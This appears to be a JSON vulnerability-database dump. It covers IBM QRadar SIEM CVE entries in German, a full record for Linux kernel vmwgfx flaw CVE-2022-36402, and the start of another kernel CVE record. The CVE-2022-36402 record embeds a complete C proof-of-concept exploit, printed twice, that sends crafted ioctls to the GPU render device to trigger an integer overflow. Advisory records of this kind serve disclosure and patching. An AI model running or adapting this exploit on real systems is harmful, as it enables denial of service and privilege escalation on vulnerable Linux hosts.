"CVE-2023-6356", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6356" }, { "cve": "CVE-2023-6535", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6535" }, { "cve": "CVE-2023-6536", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6536" }, { "cve": "CVE-2023-6546", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6546" }, { "cve": "CVE-2023-6606", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6606" }, { "cve": "CVE-2023-6610", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6610" }, { "cve": "CVE-2023-6817", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6817" }, { "cve": "CVE-2023-6931", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6931" }, { "cve": "CVE-2023-6932", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-6932" }, { "cve": "CVE-2023-7192", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-7192" }, { "cve": "CVE-2024-0565", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2024-0565" }, { "cve": "CVE-2024-0646", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2024-0646" }, { "cve": "CVE-2024-1086", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2024-1086" }, { "cve": "CVE-2024-1488", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2024-1488" }, { "cve": "CVE-2024-27269", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2024-27269" } ] }
cve-2022-36402
Vulnerability from cvelistv5
Published
2022-09-16 16:08
Modified
2024-09-17 03:38
Severity ?
EPSS score ?
Summary
There is an int overflow vulnerability in vmwgfx driver
References
▼ | URL | Tags |
---|---|---|
https://bugzilla.openanolis.cn/show_bug.cgi?id=2072 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:00:04.458Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.3-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n 0x2000,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n strerror(errno));\n }\n \n memset(vaddr,\"a\",0x2000); \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-118", "description": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-16T16:08:01", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072" ], "discovery": "INTERNAL" }, "title": "There is an int overflow vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "AKA": "Anolis", "ASSIGNER": "security@openanolis.org", "DATE_PUBLIC": "2022-09-06T07:00:00.000Z", "ID": "CVE-2022-36402", "STATE": "PUBLIC", "TITLE": "There is an int overflow vulnerability in vmwgfx driver" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "5.13.0-52", "version_value": "v4.3-rc1" } ] } } ] }, "vendor_name": "Linux" } ] } }, "credit": [ { "lang": "eng", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ] }, "exploit": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n 0x2000,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n strerror(errno));\n }\n \n memset(vaddr,\"a\",0x2000); \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}" } ], "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)" } ] } ] }, "references": { "reference_data": [ { "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072", "refsource": "MISC", "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072" } ] }, "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072" ], "discovery": "INTERNAL" } } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-36402", "datePublished": "2022-09-16T16:08:01.414003Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-17T03:38:12.736Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-26545
Vulnerability from cvelistv5
Published
2023-02-25 00:00
Modified
2024-08-02 11:53
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:53:53.581Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/fda6c89fe3d9aca073495a664e1d5aea28cd4377" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fda6c89fe3d9aca073495a664e1d5aea28cd4377" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.1.13" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230316-0009/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": 